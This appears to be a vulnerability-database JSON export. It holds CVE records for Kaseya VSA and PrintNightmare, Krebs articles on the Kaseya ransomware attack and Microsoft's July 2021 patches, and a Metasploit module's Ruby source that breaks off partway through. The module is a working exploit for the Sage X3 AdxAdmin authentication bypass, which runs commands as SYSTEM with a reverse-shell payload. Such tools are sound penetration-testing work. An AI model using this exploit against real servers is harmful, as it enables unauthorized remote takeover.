"cpe": [], "id": "CVE-2020-7389", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7389", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-12-03T14:41:41", "description": "Directory traversal vulnerability in Kaseya Virtual System Administrator (VSA) 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 allows remote authenticated users to read arbitrary files via a crafted HTTP request.", "cvss3": {}, "published": "2015-07-20T23:59:00", "type": "cve", "title": "CVE-2015-2862", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2862"], "modified": "2019-02-05T19:25:00", "cpe": [], "id": "CVE-2015-2862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2862", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T15:30:01", "description": "Windows Print Spooler Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T22:15:00", "type": "cve", "title": "CVE-2021-34527", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-02T21:08:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2021-34527", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34527", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "krebs": [{"lastseen": "2021-07-28T14:33:34", "description": "![](https://krebsonsecurity.com/wp-content/uploads/2021/07/kaseya.png)\n\nLast week cybercriminals deployed ransomware to 1,500 organizations, including many that provide IT security and technical support to other companies. The attackers exploited a vulnerability in software from **Kaseya**, a Miami-based company whose products help system administrators manage large networks remotely. Now it appears Kaseya's customer service portal was left vulnerable until last week to a data-leaking security flaw that was first identified in the same software six years ago.\n\nOn July 3, the [REvil ransomware affiliate program](<https://krebsonsecurity.com/?s=revil>) began using a zero-day security hole ([CVE-2021-30116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30116>)) to deploy ransomware to hundreds of IT management companies running Kaseya's remote management software -- known as the **Kaseya Virtual System Administrator** (VSA).\n\nAccording to [this entry for CVE-2021-30116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30116>), the security flaw that powers that Kaseya VSA zero-day was assigned a vulnerability number on April 2, 2021, indicating Kaseya [had roughly three months to address the bug before it was exploited in the wild](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>).\n\nAlso on July 3, security incident response firm **Mandiant** notified Kaseya that their billing and customer support site --**portal.kaseya.net** -- was vulnerable to [CVE-2015-2862](<https://nvd.nist.gov/vuln/detail/CVE-2015-2862>), a "directory traversal" vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser.\n\nAs its name suggests, CVE-2015-2862 was issued in July 2015. Six years later, Kaseya's customer portal was still exposed to the data-leaking weakness.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/kaseya-portal.png)\n\nThe Kaseya customer support and billing portal. Image: Archive.org.\n\nMandiant notified Kaseya after hearing about it from **Alex Holden**, founder and chief technology officer of Milwaukee-based cyber intelligence firm [Hold Security](<https://www.holdsecurity.com>). Holden said the 2015 vulnerability was present on Kaseya's customer portal until Saturday afternoon, allowing him to download the site's ["web.config" file](<https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/webconfig-file-detected/>), a server component that often contains sensitive information such as usernames and passwords and the locations of key databases.\n\n"It's not like they forgot to patch something that Microsoft fixed years ago," Holden said. "It's a patch for their own software. And it's not zero-day. It's from 2015!"\n\nThe official description of CVE-2015-2862 says a would-be attacker would need to be already authenticated to the server for the exploit to work. But Holden said that was not the case with the vulnerability on the Kaseya portal that he reported via Mandiant.\n\n"This is worse because the CVE calls for an authenticated user," Holden said. "This was not."\n\n**Michael Sanders**, executive vice president of account management at Kaseya, confirmed that the customer portal was taken offline in response to a vulnerability report. Sanders said the portal had been retired in 2018 in favor of a more modern customer support and ticketing system, yet somehow the old site was still left available online.\n\n"It was deprecated but left up," Sanders said.\n\nIn a written statement shared with KrebsOnSecurity, Kaseya said that in 2015 CERT reported two vulnerabilities in its VSA product.\n\n"We worked with CERT on responsible disclosure and released patches for VSA versions V7, R8, R9 and R9 along with the public disclosure (CVEs) and notifications to our customers. Portal.kaseya.net was not considered by our team to be part of the VSA shipping product and was not part of the VSA product patch in 2015. It has no access to customer endpoints and has been shut down - and will no longer be enabled or used by Kaseya."\n\n"At this time, there is no evidence this portal was involved in the VSA product security incident," the statement continued. "We are continuing to do forensic analysis on the system and investigating what data is actually there."\n\nThe REvil ransomware group said affected organizations could negotiate independently with them for a decryption key, or someone could pay $70 million worth of virtual currency to buy a key that works to decrypt all systems compromised in this attack.\n\nBut Sanders said every ransomware expert Kaseya consulted so far has advised against negotiating for one ransom to unlock all victims.\n\n"The problem is that they don't have our data, they have our customers' data," Sanders said. "We've been counseled not to do that by every ransomware negotiating company we've dealt with. They said with the amount of individual machines hacked and ransomwared, it would be very difficult for all of these systems to be remediated at once."\n\nIn a video posted to Youtube on July 6, Kaseya CEO **Fred Voccola** said the ransomware attack had "limited impact, with only approximately 50 of the more than 35,000 Kaseya customers being breached."\n\n"While each and every customer impacted is one too many, the impact of this highly sophisticated attack has proven to be, thankfully, greatly overstated," Voccola said.\n\nThe zero-day vulnerability that led to Kaseya customers (and customers of those customers) getting ransomed was discovered and reported to Kaseya by [Wietse Boonstra](<https://twitter.com/wietsman>), a researcher with the **Dutch Institute for Vulnerability Disclosure** (DIVD). \n\nIn [a July 4 blog post](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>), DIVD's** Victor Gevers **wrote that Kaseya was "very cooperative," and "asked the right questions."\n\n"Also, partial patches were shared with us to validate their effectiveness," Gevers wrote. "During the entire process, Kaseya has shown that they were willing to put in the maximum effort and initiative into this case both to get this issue fixed and their customers patched. They showed a genuine commitment to do the right thing. Unfortunately, we were beaten by REvil in the final sprint, as they could exploit the vulnerabilities before customers could even patch."\n\nStill, Kaseya has yet to issue an official patch for the flaw Boonstra reported in April. Kaseya [told customers on July 7](<https://venturebeat.com/2021/07/07/kaseya-patch-fixing-zero-day-attack-delayed-as-issues-hit-saas-rollout/>) that it was working "through the night" to push out an update.\n\nGevers said the Kaseya vulnerability was discovered as part of a larger DIVD effort to look for serious flaws in a wide array of remote network management tools. \n\n"We are focusing on these types of products because we spotted a trend where more and more of the products that are used to keep networks safe and secure are showing structural weaknesses," he wrote.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T15:22:58", "type": "krebs", "title": "Kaseya Left Customer Portal Vulnerable to 2015 Flaw in its Own Software", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2862", "CVE-2021-30116"], "modified": "2021-07-08T15:22:58", "id": "KREBS:6C9A4C86453CF1F4DA06688B3CC1E186", "href": "https://krebsonsecurity.com/2021/07/kaseya-left-customer-portal-vulnerable-to-2015-flaw-in-its-own-software/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:35", "description": "**Microsoft **on Tuesday issued an emergency software update to quash a security bug that's been dubbed "**PrintNightmare**," a critical vulnerability in all supported versions of** Windows** that is actively being exploited. The fix comes a week ahead of Microsoft's normal monthly Patch Tuesday release, and follows the publishing of exploit code showing would-be attackers how to leverage the flaw to break into Windows computers.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/08/windowsec.png)\n\nAt issue is [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), which involves a flaw in the Windows Print Spooler service that could be exploited by attackers to run code of their choice on a target's system. Microsoft says it has already detected active exploitation of the vulnerability.\n\n**Satnam Narang**, staff research engineer at** Tenable**, said Microsoft's patch warrants urgent attention because of the vulnerability's ubiquity across organizations and the prospect that attackers could exploit this flaw in order to take over a Windows domain controller.\n\n"We expect it will only be a matter of time before it is more broadly incorporated into attacker toolkits," Narang said. "PrintNightmare will remain a valuable exploit for cybercriminals as long as there are unpatched systems out there, and as we know, unpatched vulnerabilities have a long shelf life for attackers."\n\nIn [a blog post](<https://msrc-blog.microsoft.com/2021/07/06/out-of-band-oob-security-update-available-for-cve-2021-34527/>), Microsoft's Security Response Center said it was delayed in developing fixes for the vulnerability in **Windows Server 2016**, **Windows 10 version 1607**, and **Windows Server 2012**. The fix also apparently includes a new feature that allows Windows administrators to implement stronger restrictions on the installation of printer software.\n\n"Prior to installing the July 6, 2021, and newer Windows Updates containing protections for CVE-2021-34527, the printer operators\u2019 security group could install both signed and unsigned printer drivers on a printer server," reads Microsoft's [support advisory](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>). "After installing such updates, delegated admin groups like printer operators can only install signed printer drivers. Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\u201d\n\nWindows 10 users can check for the patch by opening Windows Update. Chances are, it will show what's pictured in the screenshot below -- that **KB5004945** is available for download and install. A reboot will be required after installation.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/kb5004945.png)\n\nFriendly reminder: It's always a good idea to backup your data before applying security updates. Windows 10 [has some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. \n\nMicrosoft's out-of-band update may not completely fix the PrinterNightmare vulnerability. Security researcher [Benjamin Delpy](<https://blog.gentilkiwi.com/>) [posted on Twitter](<https://twitter.com/gentilkiwi/status/1412771368534528001>) that the exploit still works on a fully patched Windows server if the server also has Point & Print enabled -- a Windows feature that automatically downloads and installs available printer drivers.\n\nDelpy said it's common for organizations to enable Point & Print using group policies because it allows users to install printer updates without getting approval first from IT. \n\nThis post will be updated if Windows users start reporting any issues in applying the patch.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T14:34:59", "type": "krebs", "title": "Microsoft Issues Emergency Patch for Windows Flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T14:34:59", "id": "KREBS:3CC49021549439F95A2EDEB2029CF54E", "href": "https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:34", "description": "![](https://krebsonsecurity.com/wp-content/uploads/2021/07/windupate.png)\n\n**Microsoft** today released updates to patch at least 116 security holes in its **Windows** operating systems and related software. At least four of the vulnerabilities addressed today are under active attack, according to Microsoft.\n\nThirteen of the security bugs quashed in this month's release earned Microsoft's most-dire "critical" rating, meaning they can be exploited by malware or miscreants to seize remote control over a vulnerable system without any help from users.\n\nAnother 103 of the security holes patched this month were flagged as "important," which Microsoft assigns to vulnerabilities "whose exploitation could result in compromise of the confidentiality, integrity, or availability of user data, or of the integrity or availability of processing resources."\n\nAmong the critical bugs is of course the official fix for the **PrintNightmare** print spooler flaw in most versions of Windows ([CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)) that prompted Microsoft [to rush out a patch for a week ago](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>) in response to exploit code for the flaw that got accidentally published online. That patch seems to have caused a number of problems for Windows users. Here's hoping the updated fix resolves some of those issues for readers who've been holding out.\n\n[CVE-2021-34448](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34448>) is a critical remote code execution vulnerability in the scripting engine built into every supported version of Windows -- including server versions. Microsoft says this flaw is being exploited in the wild.\n\nBoth [CVE-2021-33771](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33771>) and [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31979>) are elevation of privilege flaws in the Windows kernel. Both are seeing active exploitation, according to Microsoft.\n\n**Chad McNaughton**, technical community manager at **Automox**, called attention to [CVE-2021-34458](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34458>), a remote code execution flaw in the deepest areas of the operating system. McNaughton said this vulnerability is likely to be exploited because it is a "low-complexity vulnerability requiring low privileges and no user interaction."\n\nAnother concerning critical vulnerability in the July batch is [CVE-2021-34494](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34494>), a dangerous bug in the Windows DNS Server.\n\n"Both core and full installations are affected back to Windows Server 2008, including versions 2004 and 20H2," said **Aleks Haugom**, also with Automox.\n\n"DNS is used to translate IP addresses to more human-friendly names, so you don\u2019t have to remember the jumble of numbers that represents your favorite social media site," Haugom said. "In a Windows Domain environment, Windows DNS Server is critical to business operations and often installed on the domain controller. This vulnerability could be particularly dangerous if not patched promptly."\n\nMicrosoft also patched six vulnerabilities in **Exchange Server**, an email product that has been under siege all year from attackers. **Satnam Narang**, staff research engineer at **Tenable**, noted that while Microsoft says two of the Exchange bugs tackled this month ([CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>)) were addressed as part of its security updates from April 2021, both CVEs were somehow omitted from that April release. Translation: If you already applied the bevy of Exchange updates Microsoft made available in April, your Exchange systems have protection against these flaws.\n\nOther products that got patches today include **Microsoft Office**, **Bing**, **SharePoint Server**, **Internet Explorer**, and **Visual Studio**. The **SANS Internet Storm Center** as always has [a nice visual breakdown of all the patches by severity](<https://isc.sans.org/forums/diary/Microsoft+July+2021+Patch+Tuesday/27628/>).\n\n**Adobe** also [issued security updates today](<https://helpx.adobe.com/security.html>) for **Adobe Acrobat** and **Reader**, as well as **Dimension**, **Illustrator**, Framemaker and Adobe Bridge.\n\n**Chrome** and **Firefox** also recently have shipped important security updates, so if you haven't done so recently take a moment to save your tabs/work, completely close out and restart the browser, which should apply any pending updates.\n\nThe usual disclaimer:\n\nBefore you update with this month\u2019s patch batch, please make sure you have backed up your system and/or important files. It\u2019s not uncommon for Windows updates to hose one\u2019s system or prevent it from booting properly, and some updates even have been known to erase or corrupt files.\n\nSo do yourself a favor and backup _before_ installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, check out [AskWoody](<https://www.askwoody.com/>), which keeps a close eye out for specific patches that may be causing problems for users.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T21:41:47", "type": "krebs", "title": "Microsoft Patch Tuesday, July 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34494", "CVE-2021-34473", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34523", "CVE-2021-34458", "CVE-2021-34527", "CVE-2021-31979"], "modified": "2021-07-13T21:41:47", "id": "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "href": "https://krebsonsecurity.com/2021/07/microsoft-patch-tuesday-july-2021-edition/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-21T01:09:48", "description": "This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an available AdxAdmin service.\n", "cvss3": {}, "published": "2021-07-21T01:07:08", "type": "metasploit", "title": "Sage X3 Administration Service Authentication Bypass Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7387"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-WINDOWS-SAGE-X3_ADXSRV_AUTH_BYPASS_CMD_EXEC-", "href": "https://www.rapid7.com/db/modules/exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution',\n 'Description' => %q{\n This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.\n },\n 'Author' => [\n 'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk\n 'Aaron Herndon' # @ac3lives\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2021-07-07',\n 'References' => [\n ['CVE', '2020-7387'], # Infoleak\n ['CVE', '2020-7388'], # RCE\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ],\n 'Privileged' => true,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'CMD' => 'whoami'\n }\n }\n ],\n [\n 'Windows DLL',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Executable',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(1818)\n ]\n )\n end\n\n def vprint(msg = '')\n print(msg) if datastore['VERBOSE']\n end\n\n def check\n s = connect\n print_status('Connected')\n\n # ADXDIR command authentication header\n # allows for unauthenticated retrieval of X3 directory\n auth_packet = \"\\x09\\x00\"\n s.write(auth_packet)\n\n # recv response\n res = s.read(1024)\n\n if res.nil? || res.length != 4\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n if res.chars == [\"\\xFF\", \"\\xFF\", \"\\xFF\", \"\\xFF\"]\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n print_good('ADXDIR authentication successful.')\n\n # ADXDIR command\n adx_dir_msg = \"\\x07\\x41\\x44\\x58\\x44\\x49\\x52\\x00\"\n s.write(adx_dir_msg)\n directory = s.read(1024)\n\n return CheckCode::Safe if directory.nil?\n\n sagedir = directory[4..-2]\n print_good(format('Received directory info from host: %s', sagedir))\n disconnect\n\n CheckCode::Vulnerable(details: { sagedir: sagedir })\n rescue Rex::ConnectionError\n CheckCode::Unknown\n end\n\n def build_buffer(head, sage_payload, tail)\n buffer = ''\n\n # do things\n buffer << head if head\n buffer << sage_payload.length\n buffer << sage_payload\n buffer << tail if tail\n\n buffer\n end\n\n def write_file(sock, filenum, sage_payload, target, sagedir)\n s = sock\n\n # building the initial authentication packet\n # [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH]\n # Note: the first byte of this auth packet is different from the ADXDIR command\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n s.write(\"\\x06\\x00\")\n auth_resp = s.read(1024)\n\n fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response') if auth_resp.length != 4\n\n print_good('Command authentication successful.')\n\n # May require additional information such as file path\n # this will be used for multiple messages\n\n head = \"\\x00\\x00\\x36\\x02\\x00\\x2e\\x00\" # head\n fmt = '@%s/tmp/cmd%s$cmd'\n fmt = '@%s/tmp/cmd%s.dll' if target == 'Windows DLL'\n fmt = '@%s/tmp/cmd%s.exe' if target == 'Windows Executable'\n pload = format(fmt, revsagedir, filenum)\n tail = \"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, pload, tail)\n s.write(sendbuf)\n s.read(1024)\n\n # Packet --- 3\n # Creating the packet that contains the command to run\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n\n # this writes the data to the .cmd file to get executed\n # a single write can't be larger than ~250 bytes\n # so writes larger than 250 need to be broken up\n written = 0\n print_status('Writing data')\n\n while written < sage_payload.length\n vprint('.')\n\n towrite = sage_payload[written..written + 250]\n sendbuf = build_buffer(head, towrite, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n written += towrite.length\n end\n\n vprint(\"\\r\\n\")\n end\n\n def exploit\n sage_payload = payload.encoded if target.name == 'Windows Command'\n sage_payload = generate_payload_dll if target.name == 'Windows DLL'\n sage_payload = generate_payload_exe if target.name == 'Windows Executable'\n\n sagedir = check.details[:sagedir]\n\n if sagedir.nil?\n fail_with(Failure::NotVulnerable,\n 'No directory was returned by the remote host, may not be vulnerable')\n end\n\n if sagedir.end_with?('AdxAdmin')\n register_dir_for_cleanup(\"#{sagedir}\\\\tmp\")\n end\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n filenum = rand_text_numeric(8)\n vprint_status(format('Using generated filename: %s', filenum))\n\n s = connect\n\n write_file(s, filenum, sage_payload, target.name, sagedir)\n\n unless target.name == 'Windows Command'\n disconnect\n # re-establish connection after writing file\n s = connect\n end\n\n if target.name == 'Windows DLL'\n sage_payload = \"rundll32.exe #{sagedir}\\\\tmp\\\\cmd#{filenum}.dll,0\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n if target.name == 'Windows Executable'\n sage_payload = \"#{sagedir}\\\\tmp\\\\cmd#{filenum}.exe\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n # Some sort of delimiter\n delim0 = \"\\x02\\x00\\x01\\x01\" # bufm\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 4\n sage_payload = \"@#{revsagedir}/tmp/sess#{filenum}$cmd\"\n head = \"\\x00\\x00\\x37\\x02\\x00\\x2f\\x00\"\n tail = \"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 5\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n sage_payload = \"@echo off\\r\\n#{sagedir}\\\\tmp\\\\cmd#{filenum}.cmd 1>#{sagedir}\\\\tmp\\\\#{filenum}.out 